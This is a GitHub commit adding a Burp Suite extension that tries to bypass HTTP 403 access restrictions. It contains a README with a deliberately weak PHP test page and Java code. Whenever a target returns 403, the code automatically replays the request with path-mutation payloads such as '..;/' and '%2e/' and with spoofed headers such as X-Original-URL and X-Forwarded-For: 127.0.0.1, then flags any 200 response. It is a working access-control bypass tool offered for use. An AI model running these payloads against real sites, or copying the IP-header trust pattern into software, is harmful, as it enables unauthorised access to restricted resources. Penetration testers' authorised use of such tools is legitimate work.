Skip to content

Commit

Permalink
403ByPass_BaiZeSEC-1.0
Browse files Browse the repository at this point in the history
  • Loading branch information
@aaaahuia
aaaahuia committed Sep 9, 2022
1 parent 0192ee2 commit 7238dc0
Show file tree
Hide file tree
Showing 46 changed files with 4,441 additions and 1 deletion.
27 changes: 26 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1,27 @@
# 403ByPass
403ByPass-Burp Extensions_java

**403绕过-BurpSuite插件 by 白泽Sec-ahui**

联系方式:[email protected]

#### 工具简述:

基于常见的框架漏洞或IP伪造尝试绕过网页403限制

#### 使用方法:

`BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Java -> Select file: 403ByPass_BaiZeSEC-1.0.jar -> Next till Finish`

#### 测试代码:

```php
<?php
if($_SERVER['HTTP_X_FORWARDED_FOR']=="127.0.0.1"){
http_response_code(200);
print("200 success");
}else{
http_response_code(403);
print("403 error");
}
```

134 changes: 134 additions & 0 deletions pom.xml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,134 @@
<?xml version="1.0" encoding="UTF-8"?>

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.Baize</groupId>
<artifactId>403ByPass_BaizeSEC</artifactId>
<version>1.0</version>

<name>403bypass_BaiZeSEC</name>
<!-- FIXME change it to the project's website -->
<url>http://www.example.com</url>

<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.source>1.7</maven.compiler.source>
<maven.compiler.target>1.7</maven.compiler.target>
</properties>

<dependencies>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.11</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>net.portswigger.burp.extender</groupId>
<artifactId>burp-extender-api</artifactId>
<version>1.7.22</version>
</dependency>

<!-- https://mvnrepository.com/artifact/com.google.code.gson/gson -->
<dependency>
<groupId>com.google.code.gson</groupId>
<artifactId>gson</artifactId>
<version>2.8.6</version>
</dependency>

<!-- to get root domain -->
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>30.1-jre</version>
</dependency>

<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-text -->
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>

<!-- https://mvnrepository.com/artifact/org.beanshell/bsh -->
<dependency>
<groupId>org.beanshell</groupId>
<artifactId>bsh</artifactId>
<version>2.0b5</version>
</dependency>
</dependencies>

<build>
<sourceDirectory>src</sourceDirectory>
<pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
<plugins>

<plugin>
<artifactId>maven-assembly-plugin</artifactId>
<configuration>
<descriptorRefs>
<descriptorRef>jar-with-dependencies</descriptorRef>
</descriptorRefs>
<archive>
<manifest>
<addDefaultImplementationEntries>
true<!--to get Version from pom.xml -->
</addDefaultImplementationEntries>
</manifest>
</archive>
</configuration>
<executions>
<execution>
<id>make-assembly</id>
<phase>package</phase>
<goals>
<goal>single</goal>
</goals>
</execution>
</executions>
</plugin>
<!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
<plugin>
<artifactId>maven-clean-plugin</artifactId>
<version>3.1.0</version>
</plugin>
<!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
<plugin>
<artifactId>maven-resources-plugin</artifactId>
<version>3.0.2</version>
</plugin>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.8.0</version>
</plugin>
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
<version>2.22.1</version>
</plugin>
<plugin>
<artifactId>maven-jar-plugin</artifactId>
<version>3.0.2</version>
</plugin>
<plugin>
<artifactId>maven-install-plugin</artifactId>
<version>2.5.2</version>
</plugin>
<plugin>
<artifactId>maven-deploy-plugin</artifactId>
<version>2.8.2</version>
</plugin>
<!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
<plugin>
<artifactId>maven-site-plugin</artifactId>
<version>3.7.1</version>
</plugin>
<plugin>
<artifactId>maven-project-info-reports-plugin</artifactId>
<version>3.0.0</version>
</plugin>
</plugins>
</pluginManagement>
</build>
</project>
136 changes: 136 additions & 0 deletions src/burp/BurpExtender.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,136 @@
package burp;

import java.io.PrintWriter;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

public class BurpExtender implements IBurpExtender,IScannerCheck
{
private IExtensionHelpers _helpers;
private PrintWriter stdout;
private PrintWriter stderr;
private IBurpExtenderCallbacks _callbacks;
public static String NAME = "403ByPass_BaizeSEC";
public static String VERSION = "1.0";

@Override
public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
{
// 设置插件的名称
callbacks.setExtensionName(NAME);
this._callbacks = callbacks;

// 获取burp提供的标准输出流和错误输出流
stdout = new PrintWriter(callbacks.getStdout(), true);
stderr = new PrintWriter(callbacks.getStderr(), true);

_helpers = callbacks.getHelpers();

callbacks.registerScannerCheck(this);
this.stdout.println(basicInformationOutput());

}


@Override
public List<IScanIssue> doPassiveScan(IHttpRequestResponse baseRequestResponse) {

List<String> results = new ArrayList<>();


IRequestInfo iRequestInfo = _helpers.analyzeRequest(baseRequestResponse);


IResponseInfo iResponseInfo = _helpers.analyzeResponse(baseRequestResponse.getResponse());

if(iResponseInfo.getStatusCode()!=403) return null;
String oldReq = _helpers.bytesToString(baseRequestResponse.getRequest());
String oldUrl = iRequestInfo.getUrl().getPath();
while(oldUrl!="/" && oldUrl.endsWith("/")){
oldUrl=oldUrl.substring(0,oldUrl.length()-1);
}
String previousPath = oldUrl.substring(0,oldUrl.lastIndexOf("/"));
String lastPath = oldUrl.substring(oldUrl.lastIndexOf("/")+1);


stdout.println("Scanning: "+iRequestInfo.getUrl());

String[] payloads = new String[]{"%2e/"+lastPath, lastPath+"/.", "./"+lastPath+"/./", lastPath+"%20/", "%20"+lastPath+"%20/", lastPath+"..;/",lastPath+"?",lastPath+"??","/"+lastPath+"//",lastPath+"/",lastPath+"/.randomstring"};
String[] hpayloads = new String[]{"X-Rewrite-URL: "+oldUrl, "X-Original-URL: "+oldUrl,"Referer: /"+lastPath, "X-Custom-IP-Authorization: 127.0.0.1","X-Originating-IP: 127.0.0.1","X-Forwarded-For: 127.0.0.1","X-Remote-IP: 127.0.0.1","X-Client-IP: 127.0.0.1","X-Host: 127.0.0.1","X-Forwarded-Host: 127.0.0.1"};

for(String p:payloads){
String newReq = oldReq.replace(oldUrl,previousPath+"/"+p);
IHttpRequestResponse checkRequestResponse = _callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),_helpers.stringToBytes(newReq));
short STT_CODE = _helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode();
if(STT_CODE == 200) {
results.add("Url payload: "+_helpers.analyzeRequest(checkRequestResponse).getUrl()+" | Status code: "+STT_CODE);
}
}

for(String hp:hpayloads){
String newReq="";
if(hp.startsWith("Referer:") && oldReq.contains("Referer:")){
newReq = oldReq.replace("^Referer:.*?$",hp);
}else{
newReq = oldReq.replace("User-Agent: ",hp+"\r\n"+"User-Agent: ");
}

IHttpRequestResponse checkRequestResponse = _callbacks.makeHttpRequest(baseRequestResponse.getHttpService(),_helpers.stringToBytes(newReq));
short STT_CODE = _helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode();
if(STT_CODE == 200) {
results.add("Header payload: "+hp+" | Status code: "+STT_CODE);
}

}
if(results.toString().equals("[]")) return null;
CustomScanIssue customScanIssue = new CustomScanIssue(
_helpers.analyzeRequest(baseRequestResponse).getUrl(),
"403 ByPass Vuln",
0,
"High",
"Certain",
null,
null,
results.toString(),
null,
new IHttpRequestResponseWithMarkers[]{_callbacks.applyMarkers(baseRequestResponse, null, null)},
baseRequestResponse.getHttpService()
);

List<IScanIssue> issues = new ArrayList<>();
issues.add(customScanIssue);
stdout.println("===================================");
stdout.println("恭喜!有一个漏洞被发现,漏洞信息为: "+_helpers.analyzeRequest(baseRequestResponse).getUrl()+" "+results);
stdout.println("===================================");
return issues;
}

@Override
public List<IScanIssue> doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
return null;
}

@Override
public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) {
if (existingIssue.getUrl()==newIssue.getUrl()) return -1;
return 0;
}

/**
* 基本信息输出
*/
private static String basicInformationOutput() {

String str1 = "===================================\n";
String str2 = String.format("%s 加载成功\n", NAME);
String str3 = String.format("版本: %s\n", VERSION);
String str4 = "作者: BaiZeSec_ahui\n";
String str5 = "邮箱: [email protected]\n";
String str6 = "===================================\n";
String detail = str1 + str2 + str3 + str4 + str5 + str6;
return detail;
}


}
Loading

0 comments on commit 7238dc0

Please sign in to comment.